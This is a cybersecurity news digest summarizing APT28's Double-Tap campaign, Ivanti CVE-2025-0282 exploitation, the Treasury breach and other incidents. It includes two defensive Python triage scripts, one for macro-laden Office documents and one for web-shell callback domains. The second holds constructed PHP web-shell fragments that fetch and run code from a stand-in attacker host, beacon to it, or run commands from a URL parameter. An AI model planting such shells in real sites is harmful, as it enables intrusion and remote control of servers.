Products and people are in place for CISA to succeed, agency’s departing No. 2 official says
Summary: Nitin Natarajan reflects on his tenure at CISA, highlighting the agency’s growth and key initiatives in cybersecurity, particularly in response to increasing digital threats. As he prepares to transition leadership, he emphasizes the importance of continuity and resilience in protecting U.S. critical infrastructure.

Threat Actor: China-linked hackers | Victim: U.S.…

Fancy Bear spotted using real Kazakh government documents in spearphishing campaign | CyberScoop
Summary: A Russian-linked hacking group is using legitimate Kazakhstan government documents as phishing lures to deploy malware and spy on officials in Central Asia. This campaign, identified as “Double-Tap,” involves sophisticated malware techniques and targets multiple nations in the region.

Threat Actor: APT 28 (Fancy Bear) | Victim: Kazakhstan Government

Key Point:

The hacking group is leveraging seemingly legitimate documents to infect and spy on government officials.…
APT28’s New Espionage Campaign Uses Double-Tap Infection Chain
Summary: Security researchers have uncovered a cyber espionage campaign known as the “Double-Tap Campaign,” linked to Russia’s APT28, targeting intelligence collection in Central Asia, particularly Kazakhstan. The campaign utilizes legitimate documents as spearphishing bait, showcasing a sophisticated infection chain involving advanced malware techniques.

Threat Actor: UAC-0063 / APT28 | Victim: Kazakhstan

Key Point:

The campaign employs a “Double-Tap” technique, using two malicious Word documents to execute commands and deploy the HATVIBE backdoor.…
Double-Tap Campaign: Russia-nexus APT possibly related to APT28 conducts cyber espionage on Central Asia and Kazakhstan diplomatic relations
This report discusses a cyber espionage campaign linked to the Russian intrusion set UAC-0063, which targets Central Asian countries, particularly Kazakhstan, using weaponized Office documents. The campaign is associated with the APT28 group and aims to collect strategic intelligence concerning Kazakhstan’s diplomatic and economic relations. Affected: Kazakhstan, Ukraine, Israel, India, Kyrgyzstan, Tajikistan

Key Points:

UAC-0063 is a Russian intrusion set active since at least 2021, targeting various countries.…
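The three Double-Tap entries above describe weaponized Office documents used as a two-stage lure. As an added example (not code from the reports cited here or from the researchers named), the following Python script performs the static triage a defender would run on such a document before it reaches a user: it opens the OOXML container and reports an embedded VBA project or an external relationship that pulls a remote template or object, while ignoring ordinary hyperlinks so that benign documents are not flagged. The in-memory documents, the `build_doc` helper and the `lure.example.test` host are constructed for illustration; the script does not reproduce the specific mechanics of the Double-Tap chain.

```python
"""Static triage of Word documents for the two things a document-based lure
commonly relies on: an embedded VBA project (vbaProject.bin) and/or an
external relationship that pulls a remote template or object.

Added example for this digest; it is not any vendor's detection logic and
the documents built below are constructed, not campaign samples.
"""
import io
import re
import zipfile

RELATIONSHIP_RE = re.compile(r"<Relationship\b[^>]*>")
EXTERNAL_RE = re.compile(r'TargetMode="External"', re.IGNORECASE)
TARGET_RE = re.compile(r'Target="([^"]+)"')


def triage_office_doc(data: bytes) -> dict:
    """Return macro / external-link indicators found in an OOXML (zip) document."""
    findings = {"has_vba": False, "external_targets": [], "error": None}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        # Legacy OLE2 .doc files are not zip containers; they need an OLE
        # parser (e.g. oletools), which this example does not cover.
        findings["error"] = "not an OOXML zip (legacy .doc or unrelated file)"
        return findings
    with zf:
        for name in zf.namelist():
            low = name.lower()
            if low.endswith("vbaproject.bin"):
                findings["has_vba"] = True
            if low.endswith(".rels"):
                xml = zf.read(name).decode("utf-8", "replace")
                for rel in RELATIONSHIP_RE.finditer(xml):
                    tag = rel.group(0)
                    # Hyperlinks are external too, but are normal in clean
                    # documents; attachedTemplate / oleObject are not.
                    if "relationships/hyperlink" in tag:
                        continue
                    if EXTERNAL_RE.search(tag):
                        t = TARGET_RE.search(tag)
                        if t:
                            findings["external_targets"].append(t.group(1))
    return findings


def is_suspicious(findings: dict) -> bool:
    """Macro present, or an external part fetched over the network / UNC."""
    return findings["has_vba"] or any(
        t.lower().startswith(("http://", "https://", "\\\\", "file:"))
        for t in findings["external_targets"]
    )


def build_doc(extra_parts: dict) -> bytes:
    """Constructed minimal OOXML container, just enough structure for the checks."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        for path, body in extra_parts.items():
            zf.writestr(path, body)
    return buf.getvalue()


REL_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Constructed samples (not real lures).
CLEAN = build_doc({})
MACRO = build_doc({"word/vbaProject.bin": b"\xd0\xcf\x11\xe0 constructed VBA stub"})
REMOTE_TEMPLATE = build_doc({
    "word/_rels/settings.xml.rels":
        '<Relationships><Relationship Id="rId1" Type="' + REL_NS + 'attachedTemplate" '
        'Target="http://lure.example.test/template.dotm" TargetMode="External"/>'
        '</Relationships>'
})
HYPERLINK_ONLY = build_doc({
    "word/_rels/document.xml.rels":
        '<Relationships><Relationship Id="rId2" Type="' + REL_NS + 'hyperlink" '
        'Target="https://www.example.test/" TargetMode="External"/></Relationships>'
})

if __name__ == "__main__":
    for label, doc in [("clean", CLEAN), ("macro", MACRO),
                       ("remote-template", REMOTE_TEMPLATE), ("hyperlink", HYPERLINK_ONLY)]:
        f = triage_office_doc(doc)
        print(f"{label:16} suspicious={is_suspicious(f)} {f}")
```

Run it on a real `.docx`/`.docm` by reading the file bytes into `triage_office_doc`; a `has_vba` hit or an HTTP/UNC `attachedTemplate`/`oleObject` target is the signal to detonate the file in a sandbox rather than open it. A document that only contains hyperlinks is left alone.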
UK domain registry Nominet confirms breach via Ivanti zero-day
Summary: Nominet, the .UK domain registry, confirmed a network breach via an Ivanti VPN zero-day vulnerability, although no evidence of data leakage has been found. The incident has been reported to authorities, and access to systems has been restricted as investigations continue.

Threat Actor: UNC5337 | Victim: Nominet

Key Point:

Nominet operates over 11 million domain names and runs the UK’s Protective Domain Name Service.…
Rep. Don Bacon on cyber deterrence: ‘Speak softly and carry a big-ass stick’
Summary: Rep. Don Bacon discusses his priorities as the head of the House Armed Services cyber and innovation subcommittee, emphasizing the need for a stronger response to cyber threats, particularly from China, and the urgency of modernizing military acquisition processes. He also shares insights on the future of Cyber Command and the importance of maintaining a unified command structure.…
⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips [13 January]
Summary: This week’s cybersecurity recap highlights critical vulnerabilities, ongoing exploits, and legal actions against threat actors, emphasizing the importance of proactive security measures. Staying informed about these threats and implementing protective strategies is essential for individuals and organizations alike.

Threat Actor: UNC5337 | Victim: Ivanti

Key Point:

A critical vulnerability in Ivanti Connect Secure appliances has been exploited as a zero-day, allowing for remote code execution.…
China Targeted Foreign Investment, Sanctions Offices in Treasury Hack: Reports
Summary: Chinese cyberspies have targeted multiple offices within the US Treasury Department, including those involved with foreign investments and sanctions, in a significant cyberattack. The breach, which has raised concerns about the potential for intelligence gathering, involved accessing unclassified information through compromised systems.

Threat Actor: Chinese cyberspies (Silk Typhoon) | Victim: US Treasury Department

Key Point:

Hackers gained initial access using a compromised API key from BeyondTrust’s remote management service.…
This article provides a comprehensive overview of significant cybersecurity incidents and vulnerabilities reported recently, including outages, data breaches, and exploits targeting various platforms. Affected: Proton Mail, Ivanti VPN, Banshee, BayMark Health Services, Medusind, MirrorFace, STIIIZY, Samsung, GFI KerioControl, Mitel MiCollab, CrowdStrike, Akamai, Casio.

Key Points:

Proton Mail experienced a worldwide outage due to a surge in database connections during infrastructure migration.…
RST TI Report Digest: January 13, 2025
This week’s threat intelligence report from RST Cloud highlights significant cyber threats from various actors, including the Chinese state-sponsored group RedDelta targeting Mongolia, Taiwan, and Southeast Asia, as well as the emergence of new malware like Banshee and the Gayfemboy botnet. The report summarizes key findings from 29 threat intelligence reports, detailing tactics, techniques, and procedures (TTPs) used in these attacks, and includes numerous indicators of compromise (IoCs).…
Expired Domains Allowed Control Over 4,000 Backdoors on Compromised Systems
Summary: A cybersecurity operation by watchTowr Labs has successfully hijacked over 4,000 unique web backdoors by taking control of abandoned domains, allowing them to track compromised systems and potentially commandeer them. This initiative highlights vulnerabilities in the infrastructure used by various threat actors, revealing significant oversight in their operations.…
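The mechanism behind the watchTowr result is simple: a backdoor that phones home to a hard-coded domain belongs to whoever holds that domain, and once the original registration lapses anyone can register it. As an added example (not watchTowr's tooling), the following Python script does the defender-side version of that triage: it pulls hard-coded callback hosts out of web-shell sources, reports the ones that no longer resolve, and reduces them to the names one would register to sinkhole them. The shell fragments, the `.test` hosts and the resolver table used in the usage note are constructed for illustration.

```python
"""Triage callback domains embedded in web-shell samples and flag the ones
that no longer resolve (candidates for sinkholing / takeover).

Added example for this digest, not watchTowr Labs' code. The shell samples
below are constructed fragments, not real malware.
"""
import re
import socket
from typing import Callable, Dict, List

# Hosts that appear after a URL scheme or an "@" (mail-style beacons).
# Scheme-less hosts, e.g. fsockopen('host', 80), need a separate pass.
_HOST_RE = re.compile(r"(?:https?://|@)((?:[a-z0-9-]+\.)+[a-z]{2,})", re.IGNORECASE)


def extract_callback_domains(source: str) -> set:
    """Return lowercase hostnames referenced by URL or mail address in a script body."""
    return {m.group(1).lower() for m in _HOST_RE.finditer(source)}


def resolves(domain: str) -> bool:
    """Live resolver: True if the name currently has an A/AAAA record."""
    try:
        socket.getaddrinfo(domain, None)
        return True
    except socket.gaierror:
        return False


def dangling_domains(samples: Dict[str, str],
                     resolver: Callable[[str], bool] = resolves) -> Dict[str, List[str]]:
    """Map each sample name to the sorted list of its callback hosts that fail to resolve."""
    report: Dict[str, List[str]] = {}
    for name, body in samples.items():
        dangling = sorted(d for d in extract_callback_domains(body) if not resolver(d))
        if dangling:
            report[name] = dangling
    return report


def registrable(domain: str) -> str:
    """Crude registrable-domain reduction (last two labels). For real TLD
    structure (e.g. .co.uk) use the Public Suffix List instead."""
    return ".".join(domain.split(".")[-2:])


def takeover_candidates(report: Dict[str, List[str]]) -> List[str]:
    """Distinct registrable domains behind the dangling hosts.
    A non-resolving name is not necessarily unregistered: confirm via RDAP/WHOIS
    before assuming it can be bought."""
    return sorted({registrable(d) for hosts in report.values() for d in hosts})


# Constructed web-shell fragments: each fetches a second stage from, or beacons
# to, a hard-coded host. shell_c has no external dependency.
SAMPLES = {
    "shell_a.php": "<?php @eval(file_get_contents('http://update.example-c2.test/stage2.txt')); ?>",
    "shell_b.php": "<?php $u='http://cdn.example-c2.test:8080/x'; "
                   "mail('ops@example-c2.test', 'ok', $_SERVER['HTTP_HOST']); ?>",
    "shell_c.php": "<?php system($_GET['c']); ?>",
}

if __name__ == "__main__":
    # With the live resolver every .test name is dangling, since .test is reserved.
    report = dangling_domains(SAMPLES)
    for sample, hosts in report.items():
        print(sample, "->", hosts)
    print("registrable names to check:", takeover_candidates(report))
```

To run it offline or against a recorded DNS snapshot, pass a resolver function backed by a lookup table, e.g. `dangling_domains(SAMPLES, resolver=lambda d: TABLE.get(d, False))` where `TABLE` maps hostnames to whether they resolved at capture time; the same hook is where a production version would swap in passive DNS.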
January 10 Advisory: Actively Exploited Unauthenticated Remote Code Execution in Ivanti Connect Secure CVE-2025-0282
CVE-2025-0282 is a critical stack-based buffer overflow in Ivanti Connect Secure, Policy Secure and ZTA gateway appliances that allows unauthenticated remote code execution. Disclosed on January 8, 2025, it had been exploited in the wild since mid-December 2024. Ivanti and Mandiant are investigating the exploitation, which includes post-exploitation activity such as lateral movement and malware deployment. The fixed Connect Secure release is 22.7R2.5; Ivanti advises running its Integrity Checker Tool (ICT) before and after upgrading, and factory-resetting any appliance that shows signs of compromise before putting it back into service.…
China's UNC5337 Exploits a Critical Ivanti RCE Bug, Again
Summary: A Chinese threat actor, UNC5337, is exploiting critical vulnerabilities in Ivanti remote access devices, particularly targeting the Connect Secure and Policy Secure gateways. Despite Ivanti’s efforts to enhance security, the group has successfully deployed sophisticated malware to compromise affected systems.

Threat Actor: UNC5337 | Victim: Ivanti

Key Point:

UNC5337 has exploited CVE-2025-0282, a critical vulnerability allowing code execution without authentication.…
Treasury hackers also breached US foreign investments review office
Summary: Silk Typhoon, a Chinese state-backed hacking group, has breached multiple offices within the U.S. Treasury Department, targeting systems that review foreign investments and administer sanctions. The attackers aimed to gather intelligence on potential sanctions against Chinese entities by exploiting a stolen API key.

Threat Actor: Silk Typhoon | Victim: U.S.…

In Other News: Bank of America Warns of Data Breach, Trucking Cybersecurity, Treasury Hack Linked to Silk Typhoon
Summary: This week’s cybersecurity news roundup highlights significant developments, including vulnerabilities, data breaches, and geopolitical implications involving major companies and organizations.

Threat Actor: Natohub, Silk Typhoon | Victim: International Civil Aviation Organization, Bank of America, Green Bay Packers

Key Point:

The US Defense Department has linked Tencent and CATL to the Chinese military.…